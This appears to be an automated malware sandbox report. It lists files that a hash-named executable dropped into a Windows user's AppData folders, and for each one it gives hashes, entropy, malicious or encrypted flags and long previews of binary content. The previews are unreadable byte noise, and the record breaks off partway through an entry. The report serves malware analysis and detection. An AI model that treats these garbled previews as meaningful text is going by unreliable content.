                  Preview:..(......2..B..{...L^.q~.7..y..:.y_(f\..b..Pd......r4..*..1...x+..+..wc...3Q..._..)...Vo..w<1v....GT.2..yp..t....#.....Z.G..:.]..d...UWr....4.}P.....b.(.b.^..Y.n..-....f.....Hg......{oN.d.-...W.|.......)...t.v.Q2...b.6.....7..m..4.D...z...>...d..3.D....4e....,..}.s.ly..j.cF.j.hz../.......w...v...vp.......w..[. .".)_]r..n.S...d2..{....{.Zf2....J)!0.....g...~...r1._.N...l....x.Z.......d9t....L..g..@@........Bf......3....O...UV.;#p(....t..?.6........].J.g-..2..F....m.~4...l..2?..2..C,.*.....]Ls....w+H.P.W........p....r.M.[n.. ..ld.....f..N.p......*n.Z.5....s....MqL.w.......UE..Ww...F...._...0...)./k.r.^PC....L?.o.R.i..o../..>.v...8.....%..........wx..6,1).....:..R....#.LAy-.4BA....8......F~<e.iAO...21s..kL....X......rvA...,...4.QW.b..8...........9.....u;.+...N.....|.G.......p.....n.. .EF..o.Fi.Q.R.z....|....?.G.E.*f..z:......r6.H.5.>_T.-.@.....5\3.3.3/.....D+..-.X..T..Q.M..f."u.cX.=..z..8....L]..'....U.....4.J.z.Z...[.gU.3.i...j.

                  C:\Users\jones\AppData\Local\Comms\UnistoreDB\store.vol

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6291790
                  Entropy (8bit):0.7008080264565423
                  Encrypted:false
                  SSDEEP:6144:4zAGiDx6O5c7nv3mqZEf90y2ojFwSa+d+gOrOuWxWk3m+cun4CfYjUfSUXivOYRJ:kwxr5O+qVytR3b0r
                  MD5:0C928EC49579BC96D1B4683737FC36A5
                  SHA1:31B9396AF0754C36B2AA337FBEF28D790CDCF5DC
                  SHA-256:5AD83F1F6BCADB0D5237E87DE547C0AF2EA05E74BC22EB90BE419C9B3EB66C0A
                  SHA-512:4FD990CD02A24A41A55FC88C149CBBE54809739E37BCBE14AC364D9F39577BD790E8163FAC02212B9E8E7F0C4EA376A082CED445E3343F1A48DFBB6334E421B8
                  Malicious:false
                  Preview:... ./...\.......<.B.....Fz\_X.$t.Ci....P.1..........7......l....hl.w.,..v...bG..2....H........8%........IWY{...}-;?GC..2V.FmC+..G/.QU.!.....p.B....0!..0.m..5..E.A.Kfy.......2m.........D.W..B.......43.....6Q...........As....[y..l...Y.9.Yo._....$...[.......kI.\Y.N/.P...G.e..Q...Fx{._..*...C....3..Th(..d."........4..}.@j.|.....f..Y1...Q[. y...<L7.....<E...z.'.7g.......^.i...H.c_.0.W.k......RqL...AA...\...Y...u.......D...aM7.:..*...1{./.+h...)eh._.8.b...../..S`..(7.T.6P.....'...R.._.H.P(;..>q....q...p..A.\J...T.X.....s.[._.X......"..s......<.Cs.q_...g.^..*|._...$...[..`.t..+.....o...C5....dp9._pe.....:+..A_x....E...i...U.".si=E-c.7.......!.m"J.....P.x".1 R....y`.cs..]<.0Q.k%...Q..7..}g.*sZ.'KS.U..O%q.8......P.F.....#K..F...1!E.Pm.M.0...W9w@.V.^.0..~q....=$..A..oo}....."M.`........c..d.......<.P.....%.bZ..j..5,sz5;2..B..../p.p..M..m<N..zO<..M]...]\M4.aCb.0.6...k...lJ....^....\...........*.'0..<`.F....pO.._....w0..Fno..C)I.1.5d..wy..y.>h...P.

                  C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5196
                  Entropy (8bit):7.955560806416145
                  Encrypted:false
                  SSDEEP:96:KSTw5dCfumxmoQNufzGqfCr4H2DuyhRyqBqIuXqAMxCJYHaR79CP4Jybaa+:KS85kfumx/QNufzvfC0H2ymlCaXCTFJF
                  MD5:97E5C38AF7C8DA76D46C9AB1DA3ECCEC
                  SHA1:5065E63C0600E062FAACF195C8D644BF5D2407AB
                  SHA-256:A5FE6937E35A6D747CAEE27E9C85DE42FDD8C4E63EC1A3538A82203412258D7C
                  SHA-512:83D7C4B01C0E70C6FE13915E806B9CF0BD68431F63CAC07754549F4AD0A80AE77E1B1F3EDF044AC7533E797A7E18F78AA23491B0BA8BD1E70CBADC6717F6D128
                  Malicious:false
                  Preview:.{..mx..P...%.P.).A..yw.w.&%.H...y.A.&3.+....Hc.$...a...[.....H..)...\c...8S.....~..<g...pi.x3}*.=N<...!R...1=|1......<.H..E._.#..g.Qt.....Wl.|R".1........,.,...P..4........y..P|...9U.(#..X.......D........+&.<.m.:}..)Gq*...f..5;F(.../.>...$(.G.TQpw.r.M...5.. ...zS.G.O.....n...T....:@EYt.,;..W..vyS.......6E......~s...Q ......X.Y.W..#..c|6..]..................C.$..:.q.8...(.z[2...>9.5!=K.8..)........//..n...:..?......3g.&...).R.8..f.O.)..[?O....Mx..j..U>......<.j/.T.>Yp.....B.2..rW.t.g.w4......2...r.}...-...qBz{.^0.R.y...%7K...m......@9s..Kjs-..Isj.H....".~.8...%.i.d..$P.f....../....=G.#Z......-.#.q..~a..zS.GO..7.R.[...6h.Z...sK..oI......Pv...../^(?<.......A\R0....OuP.}v.z>.{..GV...g.Y....91...~.........k`....g.U...H....J/..C.....o..QAs.u.F..b.A.........d\.z6..Oj...T.. ......,.........3Nt.X.../...(./..r.aRd..x.Sc|..e..#....<.Go.>.,.x..".0.U.-.....}..j........;.....'.....<...V=.b...H2.......Z\M...........Ok*=.x7p.... .n.e2...m.Y.!v._..f"..'.

                  C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):988
                  Entropy (8bit):7.812992807003746
                  Encrypted:false
                  SSDEEP:24:XEwM3HDSsT8lJyubTBmQroCmzIufW1prDXELRgR5k9aXnhC3zbD:UvDSscYAmQsZMufpW5N43nD
                  MD5:7E3872083312852EED28B4C21A380C8E
                  SHA1:2AECA9AAAC13F496C54FE1B9FA3C6A82397B33A8
                  SHA-256:1ED6A1993BA92DFE4A9F16627D9B10310921D9FD3C14B25BBE554D7AA95460E8
                  SHA-512:48335FB72C34C9A7747A72B787295CD02EA1DF437BFFE3580CF2F0D4606C92440D5368D9E5CC6A32926905B1A27BB7A84282B625ACBC0F1B9707F82867AB0FB8
                  Malicious:false
                  Preview:....C...n....)..F....~..p..\.....L.i;!..1.N.D..7.T..|.C2....5R.u........./...*)8.Hq........`.......G..o:1...d...<. ....."7.g../....L.>...:n.7..&h..[(Y....p.F'._gJ.'..lE...a.......C*Mr../.Z........K:.%..`......s(..).4[....w...<.....,.a..Y...2.......4.{h]}.=,.2.6.....%/.m..e.[eT/'%q .+G..|`...Z...I.^.h{.....Ci..WY....x3tz........@.aF.F...m..Owa.`...p..O..P...5.hn..}.E.[......?[...}I.BN.<G@H>......^..6..Q.%."._m&........y'..h.G.W...w......^..&$....\z.x..1.....`..J=".l.|:.....L.'=...0....,....7..../oO....h..+<".EM.m..P.y..JD....y.Xv...l0.x!R.mq..O..#..W../.a..R.X....?.5b.s.. ......s...S..x..........+......2.I........z......g?.aR.n...D{...;..F.j........./c...:..e.y..(J.8~....b7].H:D.|..lQ.s...J.+....&....-. .=...n._..>...`..........C., ....].p;#R.~...'............!...._....`......\......DA..b..O..x7.x.)'1F..{....."...zB.*=.v..IK...w".E..{.....U..k.gi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones.cdp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1302
                  Entropy (8bit):7.826015356486921
                  Encrypted:false
                  SSDEEP:24:PXzmCFcVfR7zifnN26LAYNQjFNuM0hp484q1kcOOrfOQ7v1LgJsuk7kb3zbD:PXzJEZ7WvPkYayjS84dcxOoBuXb3nD
                  MD5:3FEDFDE9082DD71A692C1342613A03AF
                  SHA1:7DACB4031C99D288E3B424317468B537A8378549
                  SHA-256:A7330BE63149E5BFD8C99F90B3BD15FF83AC26B4DDB730A0540CEEB0906C3AC8
                  SHA-512:95435724F5F7023DB4B7ABE142A96D3259351FDC3EDEE68BC42B3BDD2CC78C734382C684AD812B5526B4FA219D0186B368DDBEF2E305C4B243DABD01C478D0B0
                  Malicious:false
                  Preview:.{.=.;9...g.Q.._~.d-.4...].o}p....)..H....;...GSsg.x...}\..L.f:.7.[..).i..8 .O..AW..R..Z...2sg.*,)s....d/..{.Q.9.B..y..>Zm.....J*...+....1..&...-.4.#A...Z..H..0.k..-1.V.F.xx1..2....X.|.@.dg..#.x!.(.C:.Q......z....XC.......M.O.u#....1k.F....L4.9..<._._DT.....}..x.yf8....a....0....l'F...e...fq>......+...3..aZ..(...Y.....WJ.....Le^.....^.z.../....p..'.B..<......S@..........H9.s..McI....I.o...F.~BQ..K..;F.s.Rh..^....3.,...oE[...S.@..z..*..qA..$Z.%.i..V.S.,...!..tdH.3n~_4.K.h.FQK;.nX....:.9.#.b.....`.%Ag...........z.....-..5e......;@............H..*\.rj.]..|..=h^2f..R...ei.I:c....@....."y:cj?..o<..'s.j...U....M"..Y......Cbpa...4..k.zD.*.N.....{.9"WF...$.E).C.E._-?.OE.r....x.....=....Os{...o.......:&.A#.F{6.:$..`..t...!.4,...r..e.(}...O."uJa.W?WB..PJ...O=.....Om.l......!S.9.C.I..6....Z...S$./..(..g.w.2..@.....9.....".*B.H...]..`,c..nf{oy80..x$MA*.y......u.....PP8..[.........s.K;..:....*.4...y^"..L.....:..l{..z....t........6

                  C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones.cdpresource

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):388
                  Entropy (8bit):7.378700843870467
                  Encrypted:false
                  SSDEEP:12:09PSGMd6sNKPumnUuk+KGp9z5MN2CW36Wcii9a:09PJM3YTyuv33zbD
                  MD5:F1743CFF40F40B00159283BB678B6F71
                  SHA1:B0C900089CA82791468A80F46205EABC70BA1F80
                  SHA-256:E6C0A2EE3087654577175778C189EC54BB82AAE2D2AA8C3C64DD77D5F6CDD66A
                  SHA-512:065F44C026D51C26BA58139F47C1AB2B65EFA1BB83C61276CE012E8947CE45BC5ACF5642F8F2CA7428640C82ECC4EC173DBDA6B2418BEC0B1AC41EF52147661B
                  Malicious:false
                  Preview:.{.iW.Q...".1..B...Pz6........z..$.J..o.!y....C^..1.c.qN....X....D....[K.I..O..Tq;i0\b.ZKt`....0h...._@;..z.Un8.._Y.;.....f.....l.a..<2....9OVM..o)+;Y.1.@...U.t.P...r.ts.cy....U.U.*.:.08uP.T..s..<.v0..ah].s.......M..G......]xK(.._.A.....).....@...>....<....j..D..hK......... usZ.[.....:li0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1048910
                  Entropy (8bit):2.669465418273659
                  Encrypted:false
                  SSDEEP:3072:RhOIORbQufM9KVEkkKNiXXePZkuzy+vlXAVg2vil1w/laBlLZIL1HxQnafujHNAt:q7R0MM8y3FuWCRzq83dI/fxuv6C8n
                  MD5:2A898C2085ED3DB43385939C49D29E2D
                  SHA1:4BACEF5FA7028744C832C428EBCDB64E97D42986
                  SHA-256:429070312F06813614B24EC71C5EDF20D896F5DEB9E4980D6A9AD2B9E6665125
                  SHA-512:37A4D7C74C4A44027EA49391EF147B2E123927BFB76D79236F978F101A590F71AC9C26EDB3D985A9A87991B82690A6FB43C95AF026A4B506D6F467BEF581DBA4
                  Malicious:true
                  Preview:SQLitFK@..+? .....:..K.].K.....F.....B..3.G...v5...F....>.N.s........C...U.-..W;/$...NQS.1gK.A,4.V.$b.f.._..H......{,..C.My.Z.....A.|@j7.....>..vc..(xb..y>.CAQ..dqu!|..X"....|..T..Y......a.z....fz.D6v/.<.....b.~.^c.CF$.f.*.6.'7Xd..t..n+..t.m..5.*.h....^......%....n2.s~.J..'..w.j..j....U.T!%.lj}..z..,z.<....z...c.5.Q.,h...Q{.yG..s.`'t6.Y..CY.k.'...MX`7....vU..|4O#.fy.)WY....n....M.-.....S.....F.....l.#.4.d.........T....{...w_..s.Zp....u.b..R..b.;...k_X.\...+...u..Y,.:Z2D.....~...P...p..x.!3.V...".N.)j.ys......*.,e$./..C..T....*..B.e....../.fi_.I=..R.vZ{...t.u!.y`.....<Q..#.K....|u..4..6R....-.2..g.R..7..4. ...3.&3..I......Z..S....y...p"p;......\b...?...Y;<.=IY.1....!I.,....'.p :.....S.JgpP.1.Z H....|.}.C.|.!pL....Cp....8....4....?P.......>.L^W..*Z!..A.q-.`v.~gcYd..6...+k.c...%.K.[p..A...%.x.".Q..+."B.*1......K.V..$....v.Xk2....J..I.i.U....lM.V.A1<..b..ii.....VT!..,.g...f...<...u,.5..0..{.....&.@.u.}.......+..u....h| ..!.....

                  C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):33102
                  Entropy (8bit):7.993269301716131
                  Encrypted:true
                  SSDEEP:768:q+LgO/NfXWgBhv1iyPW6YASo+5NxcSmR6yZl5eTd:q+L/NfXR91iyPW6Yxont5qd
                  MD5:661F3177E1F1C770FA12EF5281ABEB1D
                  SHA1:B72CCD22BAC69139A6B03DAF8C2BCBAC89DB8F31
                  SHA-256:C0EDD034A5773059AD9E95B0151FA99CF3C7FF4544EF61F0642BA3E8A731AABF
                  SHA-512:6C13B7B8178BA9C1B1D546D358F074C07955BA882B462A4FCB7E20EBE7B527F58E941EA8ACAB3EAF04DAF9E36C13DF5535641665AAC36912F228697261089F13
                  Malicious:true
                  Preview:..-..8..^}.T.$...,............<,....1....w.;5........6f.....m.Ne...J...wsB!....HS.].<4m%..x...s..N....D..WH.}.s..>......................z......j]...n.WT/...@..u@@..o'....+.Jd.,P.i....w.U..'...#....E_#....,.....4u%.."GL.r4..;.3 ...8OD..lm..p.F&...^ .6j..q..zM...w_.h.H........$...@.........._S.Kr.....s..Ni.A..N!E7.CKZ...^#.M+....u].8(.<.....'..a.:[..d..0..D..T.;C...8U...{.eCV...<.g..(G...:_...Q...q...h....._.b.Y....[?..g..e....v...|@u..%....f.eD.n.ij;.A..Q..(Y......s.^.._5BD\..*.;P?..t.....R.[.-...c......GL-.j...2.y._wQ\`R...J...'2..M...s.$...}Z%....'.. ..Y...a.....\.jF5....=.....s..(.....y..)..^.......|....(.&$..eZk:..].$jz5.s.&B...s...R-.#...7.N..............$eu............n...O.......%.f.!.P......|A^.....p.._....%.9.......nB..T.4.P..'...a.........W...=..Z>..Tr....NK.=.U.E....?e9cST.*j.......3f.\..s...`<.../X..}.......?!......A.9..0k>2d.Yc.%..8q...........".*.*e.....Q.....B.c..VcI..Q....Ph<#....<e:y=./...e.1h]SlJ.V...%.-0..7-.^l....Z..R.(9+

                  C:\Users\jones\AppData\Local\IconCache.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):25803
                  Entropy (8bit):7.992618363136842
                  Encrypted:true
                  SSDEEP:384:Py3sICov3RB78U/IpeJ3bHR+n98WlKNlNzgP0aVr/necv1RZwOR9MI7sZB4yDXYZ:6cI/RBXponm2KTJgPtpWOj7sZBfYZ
                  MD5:8FA2D3E1E916360211D0E79C07AB5DAD
                  SHA1:6BA5C2EA1B1FF65DC390E620475D8A30F0C6F808
                  SHA-256:B69E50C432CE3669E06249B5399B824F8D4B5D83CEB1DC688D375A4F0D7CC1EB
                  SHA-512:598284FF697B2E66C9934A1A08F99DC56F8209A15819D91B78E2B552F21E86808EB99BECF0C74BB158DB30D2E0225C9A038FC61E0AA1A523929D80508F91307F
                  Malicious:true
                  Preview:H...W.{..kp.!#=.\0 .........'z.Q.U..:...3.vc..yK\.c.......o.wF..*........../:..._..g-7?_...l..T....Q......<y4........Dy2.u.2..x.?.s{.....*8...[..6..S6...!|k.\M..*...o.xo...I...(...~...........#...u.a..GA..........iE/... .G.U.I...,jF.4.v*L1........U,v......;..rv..`.14`.....J.t*..s8.....*y.".YA../b.._.@.....a..s.....A....W1>$,-2d.....2..mM/9`|&..%0.....B.Cf.....;....q...j.v..+>H1.f......).+..0..h. +h>........^'|...('...3Mw..."/H..{.....q*........9..I.ih..f........F,..E..\.!~.Q..#Uj..n<^..Ru........:..y.?....4.U..!v{..D..U....H=.....G....z....?~.z......*......l.Z........F`.....l..be...xP.+G\{]..P.....}.a.)..8.N ...^.5u.v..:h....v..g..L.~.%..?;.z.#.R S....R.._C...k...dc.....`;]..Sl.U.^./e*....`...O]jZ]r.+er...<h.h|Yg...D.,.~v.l..M>.E.T..;..}.Y.....[.>Z.7N...b..N"`Z....i8Cqu.....S..O4...pV..)..4.&L..[.f'...kAO..}(.{^d.>.u.o#C@i.Q.3.AXn....M*Bh..r...LSgp.-.?..k....D..S.....g .9....A..&.gzQn......x.:Q...&..c..\.[@.."l*.$s.|}E.4..o.........

                  C:\Users\jones\AppData\Local\Microsoft\GameDVR\KnownGameList.bin

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):582670
                  Entropy (8bit):5.268457072685545
                  Encrypted:false
                  SSDEEP:6144:a2TaEwbgAgwuwtvmuBdqNUnL/H/KT8pNbGNPLRdMlduU6/24JB:1TaGV5eqNyLH/KAutubcJB
                  MD5:770B08C79FE522924057EE159DD60803
                  SHA1:0F2A1EE92D9006B237A8A77B9C0A8D10A0DC89DB
                  SHA-256:BA92CD078E842AD24C9819ABD93C7647D94B39949EA5876D05D89504E69C1DB9
                  SHA-512:6D5924EBE3ADA3E8F21004ED618B26D16F3074421AB27E2DE90F2069183647A3B420F82F891BC0A87594321D2F3B9C42ECEBE23E6D11F40F280EC06E1F715C08
                  Malicious:false
                  Preview:...........n.[d.b[bi...".@..X.[me..\....Dx]J\._.~......*......Z.u,w.O?.:...&...{..l..Mnj.........I..`..0..J$%[^.j&{:1.C..;"...5.Su..].:K.O.f~...*..2.k(.%..c.-......z..~....?T...j......zl.........ME#Re.b.}L.....`..._..P.....1.....e"k.X&<....46~j.\b../.d$&...\.%PT.6{....]I.....r.....Z.r..J.v'u.%Ha.........H.G...A..S..[..[9r>....Y..Ri....S/....W.....>,..+_x..v...Qu$.'.h.[s....\.T.A.b3.;...4*...3...._.......f~6. ).@.x 1.~4...9.+u..P..(..DH..8..."u....5Y.y...@.6^...N...W'Fm.\.q..3......?...m]s..m...........;V..l.....2.7`.}..E.......J.{._.?.(....-s.T....>4A;.......M.vF...R.....(.....M...........F..?d.1.R..Ma.Y'.q..j..e....q...Z."."AZ.}....L....Ff.?.Q..].w.2{..o.@P..n}....]Y.:[.^...U.i.E.yQ.n."...u..!/$..T.4.qg..O..$e.F.F..g..x9.n.&.9|Ou.w...>...X.x|..(V.?A.N...v9l3{...B..&..z9.p.2.2S.!.,...+6Y.?...D..D._;.#..XlI..;-.I.7*..;..........,..........'..G..*...e.1h.F...8...Iz.=iN.E..f..._.J...`~X.......q...Q.T7.Wjv.S...9U...G}&..~.KM..}....o..}?.

                  C:\Users\jones\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6906
                  Entropy (8bit):7.975122328504494
                  Encrypted:false
                  SSDEEP:96:Jg8c2S0J6Tx7bs4UCGNzkPvrPT4Xa/LTyvTS42VqbGGhqX72k8ivk495Kl:Fc30wV4rRNzkzTDQ24Oqsn8iul
                  MD5:ED14751746DACBE6DC97EE5C65AAD2F5
                  SHA1:C1677D63734A8E5E134BF3839191A76B827F8DB2
                  SHA-256:6F1A38CB9640BFE265A85FF348AD8073536FD197DE5303D7250A4E96E0DDE28F
                  SHA-512:D3380525FEFB14815C42CEF03DB92ABE952CE405F8D0E9A7C280672EF3491EA12BEB25018D7538D506ED55239CD4D6356562376FBCABF99C0FA515A85778571E
                  Malicious:false
                  Preview:10/03..!...7#..eV.g...o...._...xh>uw3..z....:Hvc. E.u.%.-.QwT.:.%P......I...;}.T...../....+\7..'.~....r..)..wn...C.s5;'.*..!P..fnJv.H..gZ.+d]...k>....).....'}[...x.s..........u.J+..K..~....p....8a?...?...4.n..H^..D,lf.L....Fh.&+.l.9.mVC..R.......F....I.z...P./Yj8.5{..$.D..N.?&....nH....=.8.'. d....s~....tFv...J.!..".-.'.y.a..:.R..vaB.s...P....B....1.......O~..a.P?.Rs_>p.^.[y.H[.....},..U..;s.2g....z.u.st.-K.k.......H...u..CY< ..=.b...b..e.Q..... ...|..Q......E}..J=.... E...D...a..r.J...n5@.f..7.u..W4.=.;........./............+.t.....2.f.,.9..bI.:.y.&d:.8Z..8..7B.Gd]>zZU..|....Z....U.bf....).1..Jy...^8..(.P..a...l..o.k..6.h.z....+b[..MR...X....~.....,.]...^....D0...&...-M@......I.........2.....7....F$..a.O.[K4.8.b@7...u..v;].R......>.JL.#_.:GFB...(.?l.+.....)...3d.....s....f.9D.~.'C...:...j..r[x..}..M....`......r.......kr...$....).i.3.4.j.03.b....Z>@.G.Z...J..{R.T|...M%...1.y=..........l.,.\~..l...:nLg......A.....]......C.

                  C:\Users\jones\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                  Category:dropped
                  Size (bytes):834
                  Entropy (8bit):7.734689144361318
                  Encrypted:false
                  SSDEEP:24:QUBye/4RfFIp4HCBtU0qeB3PaNRvWAEVH69fHLyQM73zbD:LtMfFq4Ytcy3PazWrHMHLVM73nD
                  MD5:094086A3A3C314F65BDD2820E030486C
                  SHA1:B9FF8C3E39A644B531D91C621DDCE38E96011D6E
                  SHA-256:B943163930F0A93CDDBBDDDB6847F50811B641DA6CBB59E8C013DDF7EDC479A0
                  SHA-512:93FDCFA5798CC7CE5A17BF2CB2FB2909F060E8279E4A0F86F0EBC46E7066F38282AD166EF1DD272D2FFC0B2ED4776DC403A5E593B7A9EEDA6392AE6325E68274
                  Malicious:false
                  Preview:..1.0...%......]..?o..w..{.&G.......R..B.lN._.'.*.?....8.k..O..X.L......c..D7......p...^G..^.k.....%{=W(....Q.v..y...n. #.r..T...a......"..].}..G.d.....Qg1....?E......@.,1&..^..97...~........{...>lS.S......`......v.)O....+....|...........v..wt.p..]|.../..........<S/.'.,.N...F..R.....e.T.{....&...95..9..P.HzM.(d{..F...9...).)"..}.. .xPi..=L.....$h.2.......;.[K....W..[.q.I.8J.r<Bm..pyq~t...'.{.......vL.*`x.3u(.R......,M....v4.|.M..N.(q....B1.D{f....i...QsMz."..q..a.}..n..."OD8?k.h.G..]o,....G.z.Y.A.!cSd..?;T...OY.X....-+f..s...~.x....`.[%.Za.._......D........?..n..........c!....x.C77.,.....X....L..3}:...&H.(n.;U..[X..kLn.h.Q..T..V...z...t.x.d7...t.k..._.G.a...}..S2.`.D.d[...[8c..>..7......W..".....q.[_.d..b.6i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
                  Category:dropped
                  Size (bytes):1740
                  Entropy (8bit):7.891106413284633
                  Encrypted:false
                  SSDEEP:48:Bi5eZG70SiP8eLfpGiv+AZbivZ48goLZlxtGvO3nD:45MVUeVGi3Z/8gUleg
                  MD5:42676C04500BC45C2E84066BA450B372
                  SHA1:44161699A95B388C8E1FD8A5D8D4759B3EA2D653
                  SHA-256:EA8549EADE08DF536DC3D2CEC3006788F01A8BEC7B4C4752E3245E3D05A6A8CC
                  SHA-512:B25FC2B461F06656AA9AD1E44F806C0C4E829725D14DC76928D7515D8B7ABE93C871D4CF5D3F01AC05F5ADA478376F01BE69E5C7421A967C36FF0284C6FE9083
                  Malicious:false
                  Preview:..1.0.h,.k._bY:...@.M_.G:Z.`-1... ...3._.'..I.J.z...Yr...1cc....wz.e...Q.<..*un...MRH...>.]S'P.>x.,.A......M..R.."..I.".#.....S )!..Ck...^A..5%.H.D..Z.T.>>....k..d.3 \..^w..Dlw.MW~{..`9...E......D.~2.P.$4.S..Q..S}.'.`.J.5.}....f..._..@f."..<...q,].."c...G.P.[5..d.#..pQ.(...e.....:A.4.<FQ. J......!7j.x.\g.....s.W1.x...Bd_.+....T..@z=}...$../}o..olq.I.zZ.>/>FL.pc.0u.H. ~.....lQ%.x...0..h}..p.../G..sMKx.._.c..x1..XN?.<..g.....m.&..~.k.'...w.....sW.KC..Rh\.../u.......b..F".;...P#V.o.....}Ea.j...MU.b.x......5..-....T[.p.........G.......G?.......t.mz...y>^tu.......[?....0...-.H.....6....zq:8..a...S.l......yp.......b.q..d..;M..A\M.h.5.H.........%..}..1.R.Km..L..1...H.....=Ft.."~.)I.Z>.........V.....k..@t..)..G....^6^.k......4..)U....,-.........]S....P..c..X........w./.s..7j............r...S...b.cg.73..w.w.."..S@...viI.E|l..-...v.O.z.%.D{.....f2.@.k.V..Kb........w*D.2cE....)(...D.aQ..B..Iq..s.h.y....l&}..j=...=..w..."..... .W.NoLn.4..s........vDm...Z.

                  C:\Users\jones\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1353
                  Entropy (8bit):7.865071693406819
                  Encrypted:false
                  SSDEEP:24:Ylcg3GAnat2w6XRNjhPM682aQaVhUUFQCqZfCZA3/b9OHeHhxVD3zbD:YakGFt2w6XRNjNMgaLhU4QCcCZmXHhx1
                  MD5:BE251B4A704143A5E5330B0FA83B3E60
                  SHA1:C3D8D38F638CA7021488A94481BC35216B3407C0
                  SHA-256:9573AFDA545EE8D451462A1194D137DE67B987BFD1ECFFBAD66B6592C59418E8
                  SHA-512:4EDA99DB8E20984F3404D17AD2E9625724CA64425877923620AEA546B373C316AA1D1AF473F4559E9C5187FBCCAC53FC3EE55F753FBCD9DDC5AC7A8639A5F8D5
                  Malicious:false
                  Preview:{"Rec..ZPD0.E7..#m.:.w..1..!X.)05...T..W,..{....w.(.0.r.:N.]..g.....M.h.5G...,T...k{..O.T.`6.m......jFH...Y.....=^u...4M..[.c8o..)....U..\.A.&C...Y?...n|`.oa.9...'...'\..............c...;A.+........|......Fn.....R..w.;.:x=L>b...g?#.Y...C~...p.p.2T-...6.....Q.1V}a.9...K......O..z..p..uP.d..F..5..^.l.........&.RP...|...=N#&..]A..8.H..W.....N....Wr..C....N....s..w|.]..p...u&..K..C...r..(..N..T..].Y.>Q...._.....s c7F....f.v...0.......{.....z..5ViK`..t..>e.Q.....rUP0N.0.K..C.vDm.Xx.E..].?..x>,aR$x..[Z...uK..(ER+..............N/....=G.O.R.3.Z.]`.s........}.3.....T...........5].n.X...W.*...z...Ms.t$..s..........qZ....w.{.[&...@"..$.&.N.]%....V..7.. E.,....o>.Na.p...HM.".xPEk.......pY...JK..W.........c&(>,7x1mK2k...@.....c+....{.1.{=,.O8.KV...Z..1..,f.$S .l.S.....L%..8Dt.h)..e......,#/hAG.9:.g...F.JG..)9D......O}..e.U....e7.Y.J.7...f.....Z....'...S3L.......q6...Y.3~..#..W...c.Q|.2...&.. 0'.....3...x..l...Y.X...m&.&.....ntX......8.g.".-...om..

                  C:\Users\jones\AppData\Local\Microsoft\Windows\UsrClass.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):3408206
                  Entropy (8bit):4.763102132647779
                  Encrypted:false
                  SSDEEP:24576:yVpu4G23XUooy1ncWOOctVMiA8DqkXci5QStPi5Uva:cO23XUooyCOctVMiA8DqkXci5QCy+a
                  MD5:F302B7FB4DC43C04705FCB0ED7A47E9E
                  SHA1:9144B08FE603CF975BF437F8E4EEE08AC87E4D38
